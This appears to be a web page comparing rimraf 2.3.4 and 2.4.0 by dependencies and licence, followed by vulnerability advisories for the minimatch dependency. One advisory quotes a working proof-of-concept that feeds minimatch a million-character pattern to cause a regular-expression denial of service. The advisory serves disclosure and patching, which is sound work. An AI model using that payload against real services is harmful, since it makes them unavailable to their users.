Rimraf is a crucial Node.js utility, functioning as a robust deep deletion tool akin to the Unix command rm -rf. Comparing versions 2.3.4 and 2.4.0, developers will find subtle but significant distinctions. While both share a core dependency on the glob package (version ^4.4.2) for file path matching, version 2.4.0 introduces new development dependencies: tap (version ^1.2.0) for testing and mkdirp (version ^0.5.1) for directory creation during development. These additions suggest an enhanced focus on code quality and testing rigor in the newer release.
The significant difference lies in the introduction of testing and development tools. The tap dependency indicates a structured approach to unit testing, assuring developers of a more reliable and predictable removal process. Furthermore, the mkdirp package used during development can help ensure it will work in the target environment.
Both versions, licensed under ISC, draw from the same Git repository, authored by Isaac Z. Schlueter . The release date difference show us version 2.4.0 was released later. Ultimately, the choice between versions hinges on developer needs. If you require a battle-tested, lean deletion tool, version 2.3.4 remains a solid choice. However, if you prioritize a version with more comprehensive testing, consider using the newer version 2.4.0.
All the vulnerabilities related to the version 2.4.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.